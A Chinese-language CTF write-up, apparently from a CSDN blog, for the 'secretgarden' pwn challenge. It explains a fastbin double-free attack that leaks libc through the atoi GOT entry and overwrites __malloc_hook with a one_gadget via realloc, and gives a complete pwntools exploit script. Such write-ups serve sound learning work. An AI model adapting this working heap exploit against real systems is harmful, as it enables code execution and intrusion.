hitcontraining_secretgarden

最新推荐文章于 2024-07-28 11:23:13 发布

LtfallQwQ

最新推荐文章于 2024-07-28 11:23:13 发布

阅读量38

点赞数

分类专栏： pwn_writeup 文章标签：网络安全安全系统安全

本文链接：https://blog.csdn.net/xy1458214551/article/details/135000710

版权

pwn_writeup 专栏收录该内容

25 篇文章 0 订阅

订阅专栏

文章目录

前置知识
整体思路
exp

前置知识

fastbin attack
堆风水
realloc调整栈帧打one_gadget

整体思路

首先大致看下程序，没有edit，但是在delete部分有double free。clean我的方法是没用到，下面的删除都不包括这个操作。

首先，申请两个大小为0x28的chunk1和chunk2，然后delete 1, delete 2, delete 3来构造double free。接着申请一个大小为0x40的chunk 3，此时chunk 3的指针是chunk 1。然后再次申请一个大小为0x28的chunk 4，那么chunk 4的指针就是chunk2， chunk4的内容就是chunk1。由于chunk1是chunk3的指针，我们在申请chunk 4的时候编辑chunk 1，就可以编辑chunk3的指针了。如此一来我们把chunk3的指针中的堆块地址编辑为atoi的got表地址，然后show就可以泄露出libc地址。

接下来打double free打malloc_hook就可以了。

我是用堆风水做的，做完之后看师傅们的wp方法都有直接double free打got表的，但是我做的时候没有看到说是got表有fake chunk可以用来打fastbin attack。

exp

from pwn import *
from LibcSearcher import *

filename = './secretgarden'
context(log_level='debug')
local = 1
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')

if local:
    sh = process(filename)
else:
    sh = remote('node4.buuoj.cn', 26157)

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

choice_words = 'Your choice : '

menu_add = 1
add_index_words = ''
add_size_words = 'Length of the name :'
add_content_words = 'The name of flower :'
add_color_words = 'The color of the flower :'

menu_del = 3
del_index_words = 'Which flower do you want to remove from the garden:'

menu_show = 2
show_index_words = ''

menu_edit = 4
edit_index_words = ''
edit_size_words = ''
edit_content_words = ''

def add(index=-1, size=-1, content='', color=''):
    sh.sendlineafter(choice_words, str(menu_add))
    if add_index_words:
        sh.sendlineafter(add_index_words, str(index))
    if add_size_words:
        sh.sendlineafter(add_size_words, str(size))
    if add_content_words:
        sh.sendafter(add_content_words, content)
    if add_color_words:
        sh.sendlineafter(add_color_words, color)

def delete(index=-1):
    sh.sendlineafter(choice_words, str(menu_del))
    if del_index_words:
        sh.sendlineafter(del_index_words, str(index))

def show(index=-1):
    sh.sendlineafter(choice_words, str(menu_show))
    if show_index_words:
        sh.sendlineafter(show_index_words, str(index))

def clean(index=-1, size=-1, content=''):
    sh.sendlineafter(choice_words, str(menu_edit))
    if edit_index_words:
        sh.sendlineafter(edit_index_words, str(index))
    if edit_size_words:
        sh.sendlineafter(edit_size_words, str(size))
    if edit_content_words:
        sh.sendafter(edit_content_words, content)

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)


# 第一步：利用double free+堆风水，来泄露libc地址，第0个chunk没啥用其实
add(size=0x4f0, content='111', color='222') # 0
add(size=0x28, content='111', color='222') # 1
add(size=0x28, content='333', color='444') # 2
delete(index=1)
delete(index=2)
delete(index=1)



add(size=0x40, content='aaa', color='bbb') # 3
delete(index=3) # 这里要delete是因为让size为0x30的fastbin复原

payload = p64(1) + p64(elf.got['atoi'])
add(size=0x28, content=payload, color='111') # 4
show()
leak_addr = u64((sh.recvuntil('\x7f')[-6:]).ljust(8, b'\x00'))
leak_info('leak_addr', leak_addr)
libc.address = leak_addr - 0x36e80
leak_info('libc.address', libc.address)

fake_realloc_chunk = libc.address + 0x3c4aed
add(size=0x68, content='11', color='22') # 5
add(size=0x68, content='11', color='22') # 6

delete(index=5)
delete(index=6)
delete(index=5)

# 0xb
leak_info('fake_realloc_addr', fake_realloc_chunk)
payload = p64(fake_realloc_chunk)
add(size=0x68, content=payload, color='zzz') # 7
add(size=0x68, content='xxx', color='zzz') # 8
add(size=0x68, content='xxx', color='zzz') # 9

one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

payload = b'a'*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc'] + 12)
add(size=0x68, content=payload, color='qqq') # 10
sh.sendlineafter('Your choice : ', '1')
# sh.interactive()

debug()